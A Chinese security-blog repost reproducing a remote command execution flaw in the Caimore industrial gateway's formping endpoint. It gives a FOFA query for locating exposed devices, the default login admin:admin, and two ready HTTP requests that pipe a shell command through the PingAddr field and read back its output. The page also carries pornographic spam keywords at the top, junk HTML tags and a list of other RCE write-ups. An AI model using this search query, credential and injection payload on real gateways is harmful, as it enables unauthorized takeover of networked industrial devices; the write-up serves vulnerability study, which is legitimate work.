国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

<del id="omyki"><s id="omyki"></s></del><optgroup id="omyki"><nav id="omyki"></nav></optgroup>

<li id="omyki"><strike id="omyki"></strike></li><optgroup id="omyki"><td id="omyki"></td></optgroup>

【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

2年前作者：李火火的安全圈分類：Toy博客閱讀(44)違法舉報

這篇具有很好參考價值的文章主要介紹了【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

前言

廈門才茂通信網(wǎng)關(guān)formping存在遠(yuǎn)程命令執(zhí)行漏洞，攻擊者可通過特定payload對目標(biāo)服務(wù)器發(fā)起攻擊，造成不可估量的影響。

聲明

請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。

一、漏洞描述

廈門才茂網(wǎng)關(guān)，采用開放式軟件架構(gòu)設(shè)計，是一款金屬外殼設(shè)計，帶4路千兆LAN、1路千兆WAN，采用 3G/4G/5G 廣域網(wǎng)絡(luò)上網(wǎng)通信的工業(yè)級設(shè)計無線網(wǎng)關(guān)，支持2.4GWiFi和5.8GWiFi

廈門才茂網(wǎng)關(guān)系統(tǒng)formping存在命令執(zhí)行漏洞，攻擊者通過漏洞可以執(zhí)行任意命令，導(dǎo)致服務(wù)器失陷。

二、漏洞復(fù)現(xiàn)

FOFA：app=" CAIMORE-Gateway"

弱口令 admin:admin 登錄，通過漏洞執(zhí)行l(wèi)inux命令，在通過訪問指定參數(shù)得到回顯

Payload如下：

POC1:
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 63
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip

PingAddr=127.0.0.1%7Cecho%20hellocaimao&PingPackNumb=1&PingMsg=

POC2:
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip

訪問應(yīng)用會出現(xiàn)彈窗認(rèn)證(401)機(jī)制，輸入 admin:admin 登錄
【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),才茂通信

POC驗證如下：

文章來源地址http://www.zghlxwxcb.cn/news/detail-612020.html

到了這里，關(guān)于【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符，請點擊違法舉報進(jìn)行投訴反饋，一經(jīng)查實，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費用

多個安全廠商安全設(shè)備遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)
此文章僅用于技術(shù)交流，嚴(yán)禁用于對外發(fā)起惡意攻擊?。?！該漏洞可執(zhí)行遠(yuǎn)程代碼 FOFA：body=“/webui/images/default/default/alert_close.jpg”
2024年02月03日
瀏覽(20)
xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)
XXL-JOB是一個分布式任務(wù)調(diào)度平臺，其核心設(shè)計目標(biāo)是開發(fā)迅速、學(xué)習(xí)簡單、輕量級、易擴(kuò)展?，F(xiàn)已開放源代碼并接入多家公司線上產(chǎn)品線，開箱即用。XXL-JOB分為admin和executor兩端，前者為后臺管理頁面，后者是任務(wù)執(zhí)行的客戶端。executor默認(rèn)沒有配置認(rèn)證，未授權(quán)的攻擊者可
2024年02月11日
瀏覽(16)
CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)
目錄一、漏洞信息二、環(huán)境搭建三、復(fù)現(xiàn)過程 1.測試漏洞 2.漏洞利用，反彈shell 四、修復(fù)建議一、漏洞信息漏洞名稱 GITLAB 遠(yuǎn)程命令執(zhí)行漏洞漏洞編號 CVE-2021-22205 危害等級高危 CVSS評分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8；13.9 = Gitlab CE/EE 13.9.6；13.10 = Gitlab
2024年02月05日
瀏覽(25)
億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)
此文章僅用于技術(shù)交流，嚴(yán)禁用于對外發(fā)起惡意攻擊?。?！億賽通電子文檔安全管理系統(tǒng)（簡稱：CDG）是一款電子文檔安全加密軟件，該系統(tǒng)利用驅(qū)動層透明加密技術(shù)，通過對電子文檔的加密保護(hù)，防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn)，對電子文檔進(jìn)
2024年01月21日
瀏覽(24)
HVV爆火漏洞：最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)
最近HVV爆出的很火的WPS命令執(zhí)行漏洞，其實并不是0DAY，早在2019年就出現(xiàn)了，只不過最近EXP才公開。接下來我們來復(fù)現(xiàn)一遍。 WPS Office 2023 個人版 11.1.0.15120 WPS Office 2019 企業(yè)版 11.8.2.12085 wps版本： WPS V11.1.0.12300 靶機(jī)： windows 10 攻擊機(jī)： ubuntu 20.04 ????IP:192.168.2.103 WPS 內(nèi)置了一
2024年02月11日
瀏覽(23)
Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)（CVE-2018-1273）
一、漏洞說明 Spring Data是一個用于簡化數(shù)據(jù)庫訪問，并支持云服務(wù)的開源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模塊。此漏洞產(chǎn)生于Spring Data Commons組件，該組件為提供共享的基礎(chǔ)框架，適合各個子項目使用，支持跨數(shù)據(jù)庫持久化。 Spring Data Commons組件中存在遠(yuǎn)程代碼執(zhí)行
2024年02月09日
瀏覽(21)
【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】
IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件，旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡化IT系統(tǒng)管理。 IP-guard Webserver遠(yuǎn)程命令執(zhí)行漏洞（RCE）的問題，是因為舊版本申請審批的文件預(yù)覽功能用到了一個開源的插件 flexpaper，使用的這個
2024年02月05日
瀏覽(31)
漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)
seacms_v10.1有效 cnvd-2020-22721 命令執(zhí)行漏洞海洋CMS一套程序自適應(yīng)電腦、手機(jī)、平板、APP多個終端入口。 SeaCMS v10.1存在命令執(zhí)行漏洞，在w1aqhp/admin_ip.php下第五行使用set參數(shù)，對用戶輸入沒有進(jìn)行任何處理，直接寫入文件。攻擊者可利用該漏洞執(zhí)行惡意代碼，獲取服務(wù)器權(quán)限。
2024年02月08日
瀏覽(27)
Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞（CVE-2017-5638）復(fù)現(xiàn)
Apache Struts2是Apache項目下的一個web 框架，幫助Java開發(fā)者利用J2EE來開發(fā)Web相關(guān)應(yīng)用。 Apache Struts2的Jakarta Multipart parser插件存在遠(yuǎn)程代碼執(zhí)行漏洞，攻擊者可以在使用該插件上傳文件時，修改HTTP請求頭中的Content-Type值來觸發(fā)該漏洞，導(dǎo)致遠(yuǎn)程執(zhí)行代碼。 Struts 2.3.5 – Struts 2.3.3
2024年02月15日
瀏覽(31)
思福迪Logbase運維安全管理系統(tǒng)test_qrcode_b接口遠(yuǎn)程命令執(zhí)行漏洞漏洞復(fù)現(xiàn) [附POC]
免責(zé)聲明：請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章
2024年01月17日
瀏覽(28)

<ul id="mia2w"><small id="mia2w"></small></ul>

<optgroup id="mia2w"></optgroup>

<object id="mia2w"><blockquote id="mia2w"></blockquote></object>

<optgroup id="mia2w"><td id="mia2w"></td></optgroup>

<fieldset id="mia2w"><pre id="mia2w"></pre></fieldset>

<bdo id="mia2w"><strike id="mia2w"></strike></bdo>